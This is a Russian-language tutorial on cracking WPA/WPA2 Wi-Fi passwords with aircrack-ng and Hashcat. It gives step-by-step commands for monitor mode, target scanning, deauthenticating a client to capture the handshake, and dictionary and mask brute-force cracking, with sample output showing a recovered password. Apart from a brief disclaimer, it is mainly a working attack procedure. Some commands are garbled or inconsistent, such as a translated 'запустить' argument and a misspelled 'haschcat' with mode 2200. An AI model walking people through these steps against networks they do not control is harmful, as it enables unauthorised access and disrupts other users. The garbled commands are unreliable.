В этом руководстве вы узнаете, как взломать пароли Wi-Fi с помощью Hashcat. Hashcat — это мощный инструмент для восстановления паролей, который поможет вам восстановить утерянные или забытые пароли для различных платформ, включая Windows, Linux и macOS.
⚠️Изложенный материал в этой статье всего лишь обьяснение, а не урок. Мы ни в коем случае не принуждаем вас заниматься подобной деятельностью (взломом), так как за такое можно понести административное наказания.
Hashcat также является одним из немногих инструментов, которые могут работать с графическим процессором и предлагают множество способов поиска паролей по хешам.
Самый простой способ взломать хэш — попытаться сначала угадать пароль. Атаки по словарю и перебор пароля являются наиболее распространенными способами подбора паролей.
Эти методы используют файл, содержащий слова, фразы, общие пароли и другие строки, которые могут использоваться в качестве пароля.
Включение режима монитора
Сначала нужно перевести беспроводную карту в режим монитора, используя следующую команду.
airmon-ng запустить wlan0
Я предполагаю, что имя вашего беспроводного интерфейса — wlan0, но обязательно используйте правильное имя, если оно отличается. Вы можете использовать команду «iwconfig», чтобы найти имя беспроводного интерфейса.
Поиск цели
Начните сканирование ближайших беспроводных маршрутизаторов с помощью следующей команды.
airodump-ng wlan0
CH 6][ BAT: 3 часа 9 минут ][ Прошло: 8 с ][ 2022-05-20 11:10
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
28:EF:01:34:64 :92 -29 19 1 0 6 54e WPA2 CCMP PSK Linksys
28:EF:01:35:34:85 -42 17 0 0 6 54e WPA2 CCMP PSK SkyNet 28
:EF:01:34:64:91 -29 19 1 0 1 54e WPA2 CCMP PSK TP-LINK
28:EF:01:35:39:87 -42 17 0 0 11 54e WPA2 CCMP PSK Orange-Net
BSSID STATION PWR Скорость проверки потерянных пакетов
28:EF:01:35:34: 85 28:EF:01:23:46:68 -57 0 - 1 0 1
Отобразится таблица данных для всех маршрутизаторов Wi-Fi в радиусе действия.
Для целей этой демонстрации я выберу взлом пароля моей сети «SkyNet».
Далее мне нужен MAC-адрес точки доступа (BSSID) и канал из сети. Давайте откроем другой терминал и наберем:
airodump-ng --bssid 28:EF:01:35:34:85 -c 6 --write wpa-01 wlan0
— write wpa-01 — это имя файла, в который вы записываете данные и где будет храниться четырехстороннее рукопожатие.
Вы можете использовать команду «ls», чтобы увидеть файл, который позже вам нужно будет преобразовать в другой формат, чтобы взломать пароль.
Захват рукопожатия WPA/WPA2
WPA/WPA2 использует четырехстороннее рукопожатие для аутентификации устройств в сети. Чтобы перехватить рукопожатие четырехсторонней аутентификации, вам необходимо, чтобы клиент прошел аутентификацию на точке доступа.
Если они уже прошли аутентификацию, вы можете деаутентифицировать их (отключить), и их система автоматически проведет повторную аутентификацию, в результате чего вы сможете получить четырехстороннее рукопожатие в процессе. Откройте другой терминал и введите:
aireplay-ng -0 100 -a 28:EF:01:35:34:85 -c 28:EF:01:23:46:68 wlan0
-0 означает деаутентификацию.100 — количество пакетов деаутентификации.-a 28:EF:01:35:34:85 — MAC-адрес точки доступа.-c 28:EF:01:23:46:68 — это MAC-адрес клиента, который вы деаутентифицируете.
CH 6][ Прошло: 4 с ][ 2014-03-24 17:51 ][ WPA-квитирование: 28:EF:01:35:34:85
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
28:EF:01:35:34:85 39 100 51 0 0 6 54 WPA2 CCMP PSK SkyNet
BSSID STATION PWR Проверка потерянных пакетов
28:EF:01:35:34:85 28:EF:01:23:46:68 -57 0 - 1 0 1
На экране выше обратите внимание на надпись «WPA-рукопожатие: 28:EF:01:35:34:85» в правом верхнем углу. Это означает, что airodump-ng успешно зафиксировал рукопожатие.
Преобразуйте файл .cap в формат .hccap.
Прежде чем взломать пароль, вам необходимо преобразовать файл .cap (wpa-01.cap) в формат файла hashcat .hc22000. Это можно сделать очень быстро, загрузив файл .cap на https://hashcat.net/cap2hashcat и преобразовав его в формат .hc22000.
Взлом рукопожатия WPA/WPA2
Hashcat очень гибок, поэтому я расскажу о двух наиболее распространенных атаках:
- Атака по словарю
- Атака грубой силой
Атака по словарю
Помимо hashcat вам также понадобится список слов. Список слов — это список часто используемых паролей в большом текстовом файле.
Популярный список паролей — rockyou.txt. Он содержит список часто используемых паролей и популярен среди пентестеров. Вы можете найти список слов rockyou в каталоге /usr/share/wordlists в Kali Linux.
Теперь используйте следующую команду, чтобы начать процесс взлома:
hashcat –m 22000 wpa-01.hc22000 rockyou.txt
Этой командой я запускаю hashcat в режиме 22000, предназначенном для атаки на сетевые протоколы WPA. Далее укажите имя файла, который вы хотите взломать, в моем случае это «wpa-01.hc22000», и, наконец, «rockyou.txt» — это файл списка слов.
Пароль был успешно взломан: «justletmein».
Атака грубой силы
Атака методом перебора основана на переборе всех возможных комбинаций, что приводит к огромному количеству возможных комбинаций по мере увеличения длины пароля. Чтобы начать атаку, используйте следующую команду:
haschcat –m 2200 –a 3 wpa-01.hc22000 ?l ?l ?l ?l ?l ?l ?l ?l ?l ?l
-a 3 означает, что вы используете режим грубой атаки.wpa-01.hc22000 = — это преобразованный файл .cap.?l ?l ?l ?l ?l ?l ?l ?l ?l ?l = Это ваша маска, где l = строчные буквы. Это означает, что пароль состоит из строчных букв.
Hashcat позволяет использовать следующие встроенные кодировки для атаки на файл подтверждения WPA/WPA2.
?l = abcdefghijklmnopqrstuvwxyz
?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
?d = 0123456789
?h = 0123456789abcdef
?H = 0123456789ABCDEF
?s = «space»!"#$%&'()*+,-./:;<=>? @[\ ]^_`{|}~
Допустим, ваш пароль — 87654321. Вы можете использовать собственную маску, например ?d?d?d?d?d?d?d?d
Это означает, что вы пытаетесь взломать 8-значный пароль, например 87654323 или 43446789…
Здесь вы можете увидеть пароль «justletmein». Итак, я использую маску строчных букв (?l = abcdefghijklmnopqrstuvwxyz), чтобы взломать пароль.
Заключение
В этом руководстве вы узнали, как взламывают пароли WPA2 с помощью таких инструментов, как Hashcat. Этот вид деятельности следует выполнять только в контролируемой среде и при наличии разрешения.
Надеюсь, вам понравился этот подробный урок. Если у вас есть какие-либо вопросы, не стесняйтесь оставлять комментарии.